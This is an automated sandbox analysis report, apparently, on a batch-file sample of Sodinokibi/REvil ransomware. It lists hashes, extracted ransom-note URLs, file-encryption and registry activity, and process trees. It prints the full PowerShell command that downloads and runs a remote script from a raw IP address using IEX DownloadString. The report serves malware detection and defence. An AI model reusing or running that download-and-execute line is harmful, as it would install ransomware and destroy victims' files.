Analysis
- max time kernel: 42s
- max time network: 37s
- platform: windows7_x64
- resource: win7v200722
- submitted: 22-08-2020 02:10
Static task: static1
Behavioral task: behavioral1
- Sample: 1c69f4f012b140cb5a8804fe58a41126.bat
- Resource: win7v200722
Behavioral task: behavioral2
- Sample: 1c69f4f012b140cb5a8804fe58a41126.bat
- Resource: win10v200722
General
- Target: 1c69f4f012b140cb5a8804fe58a41126.bat
- Size: 221B
- MD5: 88eb700e439d918adcecb389a5bcf6b8
- SHA1: 905eec03268857b86e52a8510eb71ca499d75361
- SHA256: a80c7d0195818572a4440425811e01f0f8259566df0d77c4ef7a928c64de77ce
- SHA512: 6c1bbe97ea867f670d521a108db6fb0cbde85c34d10b53746b16514eaa58f8e96166e105a2d4d75bfe505af85635e4670bfbdf89f0789bfa5cebdc4bf53a4755
Malware Config
Extracted from: http://185.103.242.78/pastes/1c69f4f012b140cb5a8804fe58a41126
Extracted from: C:\bfu354-readme.txt
- sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/46C78E03B01CE246
- http://decryptor.cc/46C78E03B01CE246
Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request (1 IoCs)
Processes:
| flow | pid | process |
|---|---|---|
| 3 | 1028 | powershell.exe |
Modifies extensions of user files (6 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes:
| description | ioc | process |
|---|---|---|
| File opened for modification | \??\c:\users\admin\pictures\EnableConfirm.tiff | powershell.exe |
| File renamed | C:\Users\Admin\Pictures\EnableConfirm.tiff => \??\c:\users\admin\pictures\EnableConfirm.tiff.bfu354 | powershell.exe |
| File opened for modification | \??\c:\users\admin\pictures\StopDismount.tiff | powershell.exe |
| File renamed | C:\Users\Admin\Pictures\ReadExpand.raw => \??\c:\users\admin\pictures\ReadExpand.raw.bfu354 | powershell.exe |
| File renamed | C:\Users\Admin\Pictures\StopDismount.tiff => \??\c:\users\admin\pictures\StopDismount.tiff.bfu354 | powershell.exe |
| File renamed | C:\Users\Admin\Pictures\SkipRevoke.raw => \??\c:\users\admin\pictures\SkipRevoke.raw.bfu354 | powershell.exe |
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 5 IoCs)
Processes:
| description | ioc | process |
|---|---|---|
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe |
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes:
| description | ioc | process |
|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kouk9y3.bmp" | powershell.exe |
Drops file in Program Files directory (24 IoCs)
Processes:
| description | ioc | process |
|---|---|---|
| File opened for modification | \??\c:\program files\DebugRevoke.ttf | powershell.exe |
| File opened for modification | \??\c:\program files\InstallNew.3gp | powershell.exe |
| File opened for modification | \??\c:\program files\LimitProtect.jpeg | powershell.exe |
| File opened for modification | \??\c:\program files\MeasureExpand.reg | powershell.exe |
| File opened for modification | \??\c:\program files\RestoreRemove.vstx | powershell.exe |
| File opened for modification | \??\c:\program files\SubmitRestart.wdp | powershell.exe |
| File created | \??\c:\program files (x86)\bfu354-readme.txt | powershell.exe |
| File opened for modification | \??\c:\program files\ApproveCopy.xml | powershell.exe |
| File opened for modification | \??\c:\program files\SubmitUnregister.ods | powershell.exe |
| File opened for modification | \??\c:\program files\SwitchSplit.docm | powershell.exe |
| File opened for modification | \??\c:\program files\SwitchStop.css | powershell.exe |
| File opened for modification | \??\c:\program files\TraceRestart.edrwx | powershell.exe |
| File opened for modification | \??\c:\program files\UnprotectEnable.3gp | powershell.exe |
| File opened for modification | \??\c:\program files\DenyInitialize.css | powershell.exe |
| File opened for modification | \??\c:\program files\MountResume.DVR | powershell.exe |
| File opened for modification | \??\c:\program files\NewMeasure.xps | powershell.exe |
| File opened for modification | \??\c:\program files\RestoreStep.tmp | powershell.exe |
| File opened for modification | \??\c:\program files\TestRevoke.css | powershell.exe |
| File created | \??\c:\program files\microsoft sql server compact edition\v3.5\bfu354-readme.txt | powershell.exe |
| File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\bfu354-readme.txt | powershell.exe |
| File opened for modification | \??\c:\program files\FormatExport.mp2v | powershell.exe |
| File created | \??\c:\program files\microsoft sql server compact edition\bfu354-readme.txt | powershell.exe |
| File created | \??\c:\program files\bfu354-readme.txt | powershell.exe |
| File opened for modification | \??\c:\program files\CopyConfirm.mht | powershell.exe |
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes:
| pid | process |
|---|---|
| 1028 | powershell.exe |
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
| pid | process |
|---|---|
| 1028 | powershell.exe |
| 1028 | powershell.exe |
| 1028 | powershell.exe |
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes:
| description | pid | process |
|---|---|---|
| Token: SeDebugPrivilege | 1028 | powershell.exe |
| Token: SeDebugPrivilege | 1028 | powershell.exe |
| Token: SeTakeOwnershipPrivilege | 1028 | powershell.exe |
| Token: SeBackupPrivilege | 1820 | vssvc.exe |
| Token: SeRestorePrivilege | 1820 | vssvc.exe |
| Token: SeAuditPrivilege | 1820 | vssvc.exe |
Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
| description | pid | process | target process |
|---|---|---|---|
| PID 1156 wrote to memory of 1028 | 1156 | cmd.exe | powershell.exe |
| PID 1156 wrote to memory of 1028 | 1156 | cmd.exe | powershell.exe |
| PID 1156 wrote to memory of 1028 | 1156 | cmd.exe | powershell.exe |
| PID 1156 wrote to memory of 1028 | 1156 | cmd.exe | powershell.exe |
Processes

C:\Windows\system32\cmd.exe (PID: 1156)
Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\1c69f4f012b140cb5a8804fe58a41126.bat"
- Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 1028, child of PID 1156)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1c69f4f012b140cb5a8804fe58a41126');Invoke-QVZIJBUKUSJYIH;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID: 1820)
Command line: C:\Windows\system32\vssvc.exe
- Modifies service
- Suspicious use of AdjustPrivilegeToken